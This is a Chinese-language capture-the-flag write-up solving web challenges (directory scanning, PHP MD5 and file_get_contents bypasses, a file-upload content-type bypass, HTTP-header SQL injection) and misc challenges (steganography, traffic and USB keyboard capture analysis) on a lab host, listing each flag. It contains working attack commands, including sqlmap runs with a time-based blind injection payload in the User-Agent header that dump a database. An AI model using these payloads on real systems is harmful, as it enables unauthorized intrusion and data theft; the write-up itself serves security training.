web
Web_SINGIN
签到题
源代码
渗透的本质
搜一下 渗透的本质是信息收集
附件里给了字典
用dirsearch扫一下
dirsearch -u http://172.16.17.6:7402/ -w robots.txt
找到index.phps
,id的输入值应该为admin,但是admin必须进行url编码,由于浏览器会进行一次url解码,所以如果想要服务器端进行一次url解码,则必须对admin进行两次url编码
好玩的PHP
前面两个就简单的md5绕过
参考这篇https://www.cnblogs.com/ainsliaea/p/15126218.html
后面两个值涉及到file_get_contents这个函数的绕过
file_get_contents()把整个文件读入一个字符串里。
语法:file_get_contents(path,include_path,context,start,max_length)
该函数是用于把文件的内容读入到一个字符串里的首选方法。如果服务器操作系统支持,还会使用内存映射技术来增强性能。php://input可以读取没有处理过的POST数据
所以构造payload
?a=s878926199a&b=s155964671a&c=aaa&d=php://input
简简单单的文件上传
只需要改变一下这个content-Type就行了
成功传上去
flag{94106152fb8ab204d7bff3bb13eb9e82}
简简单单的sql
先扫一下
寻找注入点
找到login.php
先fuzz一下什么回显都一样
猜测是时间盲注
但是又无法成功闭合
猜测注入点 不在这里
原来这里用的是sql头部注入 SQL注入——HTTP头部注入_http header 的sql注入-CSDN博客
使用sqlmap扫一下sqlmap学习(三)设置请求参数 - range1128 - 博客园 (cnblogs.com)
抓包后将请求头放到txt文件里面
sqlmap -r '/home/lulu/桌面/sql' --level 3
还帮我们自动生成了一个payload
用这个payload去爆破数据库名
sqlmap -r '/home/lulu/桌面/sql' --level 3 --headers= "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0' AND (SELECT 1525 FROM (SELECT(SLEEP(5)))IJxC)-- Akjd" --dbs
爆破表名
sqlmap -r '/home/lulu/桌面/sql' --level 3 --headers= "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0' AND (SELECT 1525 FROM (SELECT(SLEEP(5)))IJxC)-- Akjd" -D challenges --tables
爆破列名
sqlmap -r '/home/lulu/桌面/sql' --level 3 --headers= "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0' AND (SELECT 1525 FROM (SELECT(SLEEP(5)))IJxC)-- Akjd" -D challenges -T user_agents --cloumns
爆破字段
sqlmap -r '/home/lulu/桌面/sql' --level 3 --headers= "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0' AND (SELECT 1525 FROM (SELECT(SLEEP(5)))IJxC)-- Akjd" -D challenges -T user_agents -C user_agent --dump
flag{8faf525dc3c4c7c43a9c163a57904c35}
Misc
Xjpg
F5去搜一下
安装F5-steganography和使用,及解决java环境版本报错问题-CSDN博客
找到这个隐写工具
跟着教程做就得了
但是这个java11的环境需要整一下
把output.txt拖进010
发现是个压缩包
解码后得到flag
flag{ad45f2-a52f3-ae956ff-ac4b2e}
流量分析1
把这个zip文件导出来
解压后得到6个文件
这个9850非常的眼熟
把6个txt文件合并为一个txt文件 十六进制粘贴到010里面
最后的文件尾也对上了
获得flag
流量分析2
过滤http流
我们发现他成功回显的长度是321
先ctrl+f找到爆破第一个字符串的包
所以过滤一下长度为321的包
然后已时间排序
从标记的下面就是flag字符串的aci码
flag{skysql_is_very_cool!233}
流量分析3
usb流量分析
长度为八个字节 应该为键盘流量
word的密码是
‘qazwsxedcrfv’
flag{685b42b0-da3d-47f4-a76c-0f3d07ea9604}
参考CTF流量分析常见题型(二)-USB流量_ctf usb流量分析-CSDN博客